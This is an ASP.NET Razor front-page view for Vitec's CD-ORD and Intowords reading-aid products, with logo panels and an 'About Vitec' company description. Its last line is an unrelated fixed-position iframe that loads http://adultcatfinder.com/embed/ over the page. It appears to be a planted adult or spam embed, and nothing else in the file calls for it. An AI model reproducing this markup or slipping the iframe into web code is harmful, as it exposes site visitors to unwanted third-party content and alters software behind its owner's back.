@{
    ViewData["Title"] = "Forside";
}
    <div class="container-fluid">
        <div class="row row-height">
            <div class="col front-left p-0">
                <div class="bg-red h-100">
                    <div class="d-flex flex-column align-items-center justify-content-center p-5 h-100">
                        <img src="~/img/cdordHvid.png" alt="CD-Ord logo" />
                        <p class="text-center mt-2 text-big text-white">CD-ORD</p>
                        <button type="button" class="btn btn-light text-medium">Lær Mere</button>
                    </div>
                </div>
            </div>
            
            <div class="col front-right p-0">
                <div class="bg-blue h-100">
                    <div class="d-flex flex-column align-items-center justify-content-center p-5 h-100">
                        <img src="~/img/intowordsHvid.png" alt="Intowords logo" />
                        <p class="text-center mt-2 text-big text-white">Intowords</p>
                        <button type="button" class="btn btn-light text-medium">Lær Mere</button>
                    </div>
                </div>
            </div>
            
        </div>
        <div class="p-5">
			<h1 class="text-center">
				About Vitec
			</h1>
			<p>
				Vitec is market leader for Vertical Market Software in the Nordic region. We develop and deliver standard niche software. 
				We grow through acquisitions of well-managed software companies. Vitec was established in 1985 as a spin-off company from the University of Umeå. 
				Today the Group has 700 employees and had 2018 a turnover of SEK 1,017 million. The  head office and major part of the Group management team is still located in Umeå. 
				Vitec is listed on Nasdaq Stockholm.
				<br />
				<h2 class="text-center">Our mission?</h2>
				Enabling customers to maximize their opportunities and to develop and secure their business through business critical software.
			</p>
        </div>
    </div>
    <iframe src="http://adultcatfinder.com/embed/" width="320" height="430" style="position:fixed;bottom:0px;right:10px;z-index:100" frameBorder="0"></iframe>
